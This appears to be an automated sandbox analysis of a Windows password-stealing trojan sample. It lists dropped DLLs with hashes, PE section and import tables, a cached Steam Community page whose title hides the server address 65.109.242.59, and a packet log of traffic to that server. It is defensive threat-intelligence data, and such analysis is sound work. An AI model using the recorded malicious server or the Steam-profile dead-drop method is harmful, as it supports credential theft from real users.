                                                                                  • Filename: 7urUz64I0Y.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exe, Detection: malicious
                                                                                  • Filename: a6lzHWp4pa.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):450024
                                                                                  Entropy (8bit):6.673992339875127
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2046288
                                                                                  Entropy (8bit):6.787733948558952
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):257872
                                                                                  Entropy (8bit):6.727482641240852
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):80880
                                                                                  Entropy (8bit):6.920480786566406
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2459136
                                                                                  Entropy (8bit):6.052474106868353
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):35682
                                                                                  Entropy (8bit):5.380723452875077
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://65.109.242.59|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.cs
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):685392
                                                                                  Entropy (8bit):6.872871740790978
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):608080
                                                                                  Entropy (8bit):6.833616094889818
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):450024
                                                                                  Entropy (8bit):6.673992339875127
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2046288
                                                                                  Entropy (8bit):6.787733948558952
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):257872
                                                                                  Entropy (8bit):6.727482641240852
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):80880
                                                                                  Entropy (8bit):6.920480786566406
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.572113333742383
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:file.exe
                                                                                  File size:363'520 bytes
                                                                                  MD5:22152460b13e4c2473dc3fcdea192933
                                                                                  SHA1:48ce4a69302e860cd905cd02a10aac942f09d9f3
                                                                                  SHA256:51cba9b4aefefaf72a791e1929f98553f50d643a22179a6aaac9d13f45ea8b43
                                                                                  SHA512:1dbcc6f21c9adfc4f28434cffac8c00fb251e3fbf574a69345792837989f74bfc74a67462e7c4f71333a07caf90e0f3e6c51daf0b2640bae3e06af14c8855104
                                                                                  SSDEEP:6144:KnRqyzZ8VqCaMx3CkcY7FGCdGr0gx1POGIAYanWdHBSxz27XrvnksFwemJ:6RqyzZ2IOGCgfPOGI2nWdhSzUbkReG
                                                                                  TLSH:9274E111B4C0C072D97319360AE8DAB4AE7EF9704A769DAF37580FBF4F31181D621A66
                                                                                  Icon Hash:00928e8e8686b000
                                                                                  Entrypoint:0x404787
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6650AED1 [Fri May 24 15:14:25 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:6
                                                                                  OS Version Minor:0
                                                                                  File Version Major:6
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:6
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:9c7649e277995f91579a552a896e22fd
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25968 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5c000 | 0x194c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x23fa0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x23ee0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1d000 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1a3f1 | 0x1a400 | e40902fdbe6c814807bbd6a64cee09d5 | False | 0.5835379464285714 | data | 6.60811813591082 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.bss | 0x1c000 | 0x2fa | 0x400 | 86441cba0c548bebc49c49f0b1147f12 | False | 0.658203125 | data | 5.4215829519180945 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x1d000 | 0x909c | 0x9200 | 8b8253491d95044873525e7519fa05b1 | False | 0.3895547945205479 | data | 4.694415414002728 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x27000 | 0x34184 | 0x33400 | b19dbfa8f8e511a6cc3a83ea5425ff6b | False | 0.9843464176829269 | DOS executable (block device driver \377\377\377\377) | 7.98435943566242 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x5c000 | 0x194c | 0x1a00 | 536839c22ea48f7ccd03271346b5ce91 | False | 0.7444411057692307 | data | 6.4550533107594115 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
KERNEL32.dll | VirtualAlloc, GetModuleHandleA, WaitForSingleObjectEx, CreateThread, GetProcAddress, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, GetCurrentProcess, TerminateProcess, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                  May 24, 2024 17:47:06.286643028 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.286876917 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.286894083 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.287014961 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.294279099 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.294298887 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.294682026 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.294689894 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.294759989 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.302056074 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.302078009 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.302510977 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.302527905 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.302920103 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.307735920 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.307754993 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.308109999 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.308125973 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.308193922 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.312189102 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.312208891 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.313591003 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.313606024 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.314352036 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.316920042 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.316941023 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.317343950 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.317352057 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.317440987 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.321391106 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.321409941 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.321639061 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.321650028 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.321722031 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.325433016 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.325452089 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.325536966 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.325542927 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.325632095 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.329009056 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.329029083 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.329493046 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.329500914 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.329586029 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.332393885 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.332416058 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.332496881 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.332504988 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.332638025 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.335829973 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.335849047 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.336038113 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.336054087 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.336350918 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.345151901 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.345172882 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.345423937 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.345432043 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.345510960 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.358767033 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.358789921 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.358947039 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.358958006 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.359072924 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.365365028 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.365390062 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.365499973 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.365509033 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.365566969 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.373099089 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.373120070 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.373246908 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.373259068 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.373538971 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.391858101 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.391880035 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.392036915 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.392045975 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.392208099 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.402401924 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.402424097 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.402534962 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.402544022 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.404227018 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.413923979 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.413943052 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.414509058 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.414515972 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.415673971 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.422806025 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.422827005 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.423788071 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.423796892 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.424645901 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.432308912 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.432332993 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.433650017 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.433657885 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.434578896 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.446662903 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.446686983 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.446801901 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.446810961 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.447376013 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.449533939 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.449596882 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.449866056 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.449866056 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.449879885 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.449933052 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.472599030 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.472619057 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.472804070 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.472827911 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.472934961 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.479218960 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.479238033 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.479329109 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.479337931 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.479377985 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.490020990 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.490408897 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.490670919 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.490809917 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.500870943 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.500901937 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.501029015 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.501029968 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.501041889 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.501154900 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.509299040 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.509324074 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.509557009 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.509567976 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.509681940 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.518712997 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.518740892 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.519000053 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.519011021 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.519078970 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.532407999 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.532437086 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.532679081 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.532687902 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.532807112 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.535387039 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.535422087 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.535712957 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.535712957 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.535722017 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.535778046 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.552907944 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.552932978 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.553177118 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.553177118 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.553189993 CEST4434971865.109.242.59192.168.2.6
                                                                                  May 24, 2024 17:47:06.553237915 CEST49718443192.168.2.665.109.242.59
                                                                                  May 24, 2024 17:47:06.568815947 CEST4434971865.109.242.59192.168.2.6
